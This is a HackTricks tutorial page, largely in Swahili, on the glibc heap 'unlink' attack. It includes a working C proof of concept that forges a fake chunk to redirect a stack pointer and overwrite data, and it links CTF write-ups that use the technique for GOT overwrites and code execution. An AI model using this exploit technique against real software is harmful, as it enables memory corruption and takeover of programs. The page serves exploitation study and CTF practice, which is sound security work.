Unlink Attack
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Wakati shambulio hili lilipogunduliwa, liliruhusu hasa WWW (Andika Nini Wapi), hata hivyo, ukaguzi fulani ziliongezwa zikifanya toleo jipya la shambulio kuwa la kuvutia zaidi, gumu zaidi na lisilo na maana.
```c #include #include #include #include
// Altered from https://github.com/DhavalKapil/heap-exploitation/tree/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/unlink_exploit.c to make it work
struct chunk_structure { size_t prev_size; size_t size; struct chunk_structure *fd; struct chunk_structure *bk; char buf[10]; // padding };
int main() { unsigned long long *chunk1, *chunk2; struct chunk_structure *fake_chunk, *chunk2_hdr; char data[20];
// First grab two chunks (non fast) chunk1 = malloc(0x8000); chunk2 = malloc(0x8000); printf("Stack pointer to chunk1: %p\n", &chunk1); printf("Chunk1: %p\n", chunk1); printf("Chunk2: %p\n", chunk2);
// Assuming attacker has control over chunk1's contents // Overflow the heap, override chunk2's header
// First forge a fake chunk starting at chunk1 // Need to setup fd and bk pointers to pass the unlink security check fake_chunk = (struct chunk_structure *)chunk1; fake_chunk->size = 0x8000; fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P
// Next modify the header of chunk2 to pass all security checks chunk2_hdr = (struct chunk_structure *)(chunk2 - 2); chunk2_hdr->prev_size = 0x8000; // chunk1's data region size chunk2_hdr->size &= ~1; // Unsetting prev_in_use bit
// Now, when chunk2 is freed, attacker's fake chunk is 'unlinked' // This results in chunk1 pointer pointing to chunk1 - 3 // i.e. chunk1[3] now contains chunk1 itself. // We then make chunk1 point to some victim's data free(chunk2); printf("Chunk1: %p\n", chunk1); printf("Chunk1[3]: %x\n", chunk1[3]);
chunk1[3] = (unsigned long long)data;
strcpy(data, "Victim's data");
// Overwrite victim's data using chunk1 chunk1[0] = 0x002164656b636168LL;
printf("%s\n", data);
return 0; }
</details>
* Shambulio halifanyi kazi ikiwa tcaches zinatumika (baada ya 2.26)
### Lengo
Shambulio hili linaruhusu **kubadilisha kiashiria cha kipande kuashiria anwani 3 kabla yake**. Ikiwa eneo hili jipya (mazingira ya mahali ambapo kiashiria kilikuwa) lina vitu vya kuvutia, kama vile allocations nyingine zinazoweza kudhibitiwa / stack..., inawezekana kusoma/kufuta ili kusababisha madhara makubwa zaidi.
* Ikiwa kiashiria hiki kilikuwa kimewekwa kwenye stack, kwa sababu sasa kinaashiria anwani 3 kabla yake na mtumiaji anaweza kukisoma na kukibadilisha, itakuwa inawezekana kuvuja taarifa nyeti kutoka kwenye stack au hata kubadilisha anwani ya kurudi (labda) bila kugusa canary
* Katika mifano ya CTF, kiashiria hiki kimewekwa kwenye orodha ya viashiria vya allocations nyingine, kwa hivyo, kufanya kiashiria hiki kiashirie anwani 3 kabla na kuwa na uwezo wa kusoma na kuandika, inawezekana kufanya viashiria vingine viashirie anwani nyingine.\
Kwa kuwa mtumiaji anaweza pia kusoma/kuandika allocations nyingine, anaweza kuvuja taarifa au kufuta anwani mpya katika maeneo yasiyo na mpangilio (kama katika GOT).
### Mahitaji
* Udhibiti fulani katika kumbukumbu (mfano, stack) ili kuunda vipande kadhaa kwa kutoa thamani kwa baadhi ya sifa.
* Kuvaa stack ili kuweka viashiria vya kipande bandia.
### Shambulio
* Kuna vipande kadhaa (kipande1 na kipande2)
* Mshambuliaji anadhibiti maudhui ya kipande1 na vichwa vya kipande2.
* Katika kipande1 mshambuliaji anaunda muundo wa kipande bandia:
* Ili kupita ulinzi anahakikisha kuwa uwanja `size` ni sahihi ili kuepuka kosa: `corrupted size vs. prev_size while consolidating`
* na viwanja `fd` na `bk` vya kipande bandia vinaashiria mahali ambapo kiashiria cha kipande1 kimehifadhiwa kwa ofset za -3 na -2 mtawalia hivyo `fake_chunk->fd->bk` na `fake_chunk->bk->fd` vinaashiria nafasi katika kumbukumbu (stack) ambapo anwani halisi ya kipande1 inapatikana:
<figure><img src="../../.gitbook/assets/image (1245).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit">https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit</a></p></figcaption></figure>
* Vichwa vya kipande2 vinabadilishwa kuonyesha kuwa kipande kilichopita hakitumiki na kwamba ukubwa ni ukubwa wa kipande bandia kilichomo.
* Wakati kipande cha pili kinapofutwa basi kipande hiki bandia kinachukuliwa mbali kinatokea:
* `fake_chunk->fd->bk` = `fake_chunk->bk`
* `fake_chunk->bk->fd` = `fake_chunk->fd`
* Awali ilifanywa kwamba `fake_chunk->fd->bk` na `fake_chunk->bk->fd` vinaashiria mahali pamoja (mahali katika stack ambapo `kipande1` kilihifadhiwa, kwa hivyo ilikuwa orodha halali iliyo na uhusiano). Kwa kuwa **vyote vinaashiria mahali pamoja** ni yule wa mwisho tu (`fake_chunk->bk->fd = fake_chunk->fd`) atachukua **athari**.
* Hii itakuwa **kufuta kiashiria cha kipande1 katika stack kwa anwani (au bytes) zilizohifadhiwa anwani 3 kabla katika stack**.
* Kwa hivyo, ikiwa mshambuliaji angeweza kudhibiti maudhui ya kipande1 tena, ataweza **kuandika ndani ya stack** akiwa na uwezo wa kufuta anwani ya kurudi akikwepa canary na kubadilisha thamani na viashiria vya mabadiliko ya ndani. Hata kubadilisha tena anwani ya kipande1 iliyohifadhiwa katika stack kwa mahali tofauti ambapo ikiwa mshambuliaji angeweza kudhibiti tena maudhui ya kipande1 ataweza kuandika popote.
* Kumbuka kwamba hii ilikuwa inawezekana kwa sababu **anwani zinawekwa katika stack**. Hatari na unyakuzi inaweza kutegemea **mahali ambapo anwani za kipande bandia zinahifadhiwa**.
<figure><img src="../../.gitbook/assets/image (1246).png" alt=""><figcaption><p><a href="https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit">https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit</a></p></figcaption></figure>
## Marejeleo
* [https://heap-exploitation.dhavalkapil.com/attacks/unlink\_exploit](https://heap-exploitation.dhavalkapil.com/attacks/unlink\_exploit)
* Ingawa itakuwa ya ajabu kupata shambulio la unlink hata katika CTF hapa una baadhi ya maandiko ambapo shambulio hili lilitumika:
* Mfano wa CTF: [https://guyinatuxedo.github.io/30-unlink/hitcon14\_stkof/index.html](https://guyinatuxedo.github.io/30-unlink/hitcon14\_stkof/index.html)
* Katika mfano huu, badala ya stack kuna orodha ya anwani za malloc'ed. Shambulio la unlink linafanywa ili kuweza kuunda kipande hapa, kwa hivyo kuwa na uwezo wa kudhibiti viashiria vya orodha ya anwani za malloc'ed. Kisha, kuna kazi nyingine inayoruhusu kubadilisha maudhui ya vipande katika anwani hizi, ambayo inaruhusu kuashiria anwani kwa GOT, kubadilisha anwani za kazi ili kupata leaks na RCE.
* Mfano mwingine wa CTF: [https://guyinatuxedo.github.io/30-unlink/zctf16\_note2/index.html](https://guyinatuxedo.github.io/30-unlink/zctf16\_note2/index.html)
* Kama katika mfano wa awali, kuna orodha ya anwani za allocations. Inawezekana kufanya shambulio la unlink ili kufanya anwani ya allocation ya kwanza iashirie nafasi chache kabla ya kuanza kwa orodha na kufuta allocation hii katika nafasi mpya. Kwa hivyo, inawezekana kufuta viashiria vya allocations nyingine ili viashirie GOT ya atoi, kuichapisha ili kupata uvujaji wa libc, na kisha kufuta GOT ya atoi kwa anwani ya gadget moja.
* Mfano wa CTF na kazi za malloc na free za kawaida zinazotumia vuln inayofanana sana na shambulio la unlink: [https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw17\_minesweeper/index.html](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw17\_minesweeper/index.html)
* Kuna overflow inayoruhusu kudhibiti viashiria vya FD na BK vya malloc ya kawaida ambayo itakuwa (kawaida) imefutwa. Zaidi ya hayo, heap ina exec bit, kwa hivyo inawezekana kuvuja anwani ya heap na kuashiria kazi kutoka kwa GOT kwa kipande cha heap chenye shellcode cha kutekeleza.
<div data-gb-custom-block data-tag="hint" data-style='success'>
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki hila za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
</div>
